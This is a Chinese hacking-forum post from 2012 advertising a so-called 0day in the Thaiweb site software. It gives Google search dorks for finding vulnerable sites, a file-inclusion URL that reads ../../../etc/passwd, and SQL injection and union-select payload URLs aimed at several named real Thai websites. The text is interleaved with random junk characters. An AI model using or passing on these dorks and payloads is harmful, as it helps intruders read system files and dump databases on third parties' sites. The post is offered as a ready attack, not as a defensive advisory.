找回密码
 立即注册
查看: 2792|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:
! N: A& p% J* A6 h5 s
9 S6 B1 N$ ?6 ^; f$ h5 r" Yintext:powered by Thaiweb% O7 _% ^' ]; _5 W: j* Q+ g' O

7 E( A' K3 q, |7 n4 Q- C& b; ~  ~. g6 M* Yinurl:index.php?page=board.php
  W/ r, ~4 i5 v, \: w* D, _2 f7 h, g& g

& t' J2 Y9 L( p) }8 U! ^
9 A, ^, k# l! t! A  \* Z/ F3 I利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
  A9 l8 h, q5 ]/ J2 J  K: C. }; K) k" O  j. [2 D+ W" S

$ I& x# |- Q: T# d- ^% u0 K( y2 c" l' p5 H, o# C4 J+ z/ A' `
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'% J0 s  _* W! U

0 q4 [; Z: X0 R+ w. J0 V2 }' G
: n$ }9 N3 W. x  v3 ~- \) p' W
) }( o+ w% v; S# ghttp://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--, U1 Y) ?2 }1 _

8 R# b7 l! q: K4 P6 bhttp://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--/ K% D2 j# W* I
: T3 D* ^# m! _7 K  `- B1 f
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--4 j$ t% v) M9 H9 A4 S- x2 h6 ?
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表